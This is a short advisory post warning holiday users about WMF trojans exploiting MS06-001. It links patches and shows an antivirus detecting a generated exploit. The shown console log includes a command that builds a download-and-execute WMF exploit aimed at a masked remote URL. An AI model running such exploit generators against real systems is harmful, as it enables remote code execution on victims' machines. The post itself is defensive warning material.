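Spring Festival is almost here, so be careful about WMF trojans when you go online over the holiday. These trojans are already starting to spread. For background on WMF trojans, see the following article:
To avoid infection, install the patch for the WMF vulnerability:
Official patch: http://www.microsoft.com/china/technet/Security/bulletin/ms06-001.mspx
Third-party patch: http://www.hexblog.com/2005/12/wmf_vuln.html
Alternatively, update your antivirus software and keep real-time monitoring enabled while you are online. At present, most AV products can detect these WMF trojans (click here to see KV's test results).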
———– cut here————
f:\wmf_maker>ms0601 http://xxx.xxx.xxx.xxx/xxx.exe
Microsoft Windows WMF Download and Exec Exploit
———————————————–
based on wmf_exp.wmf, shellcode from thc
shellc0de@2006Compiled by www.yibujh.com
[+] Using URL: http://xxx.xxx.xxx.xxx/xxx.exe
[+] Opening exploit.wmf: Ok!
[+] Writing Header: Ok!
[+] Writing Shellcode: Ok!
[+] Writing Nops: Ok!
[+] Writing Footer: Ok!
[+] Done!

f:\wmf_maker>kv exploit.wmf
KVD3000 32bit version 9.000A, (c) Jiangmin, inc, 1998-2004

Load kvlb\KVA.VLB….
Load kvlb\kvb.vlb…
Load kvlb\kvc.vlb…
Load kvlb\kvd.vlb…
Load kvlb\kve.vlb…
Load kvlb\kvf.vlb…
Load kvlb\kvg.vlb…
Load kvlb\kvh.vlb…
Load kvlb\kvi.vlb…
Load kvlb\kvj.vlb…
Load kvlb\KVK.VLB…
Load kvlb\kvl.vlb…
Load kvm.vlb…
Load kvlb\kvn.vlb…

f:\wmf_maker\exploit.wmf found: Exploit.WMF.SetAbortProc
Total 1 files scaned.
Total 1 virus bodies found, 1 virus varieties, 0 warning
Total 0 exepack inspected, 0 files extracted from 0 compressed files.
Scan time: 0:00:00
———– cut here————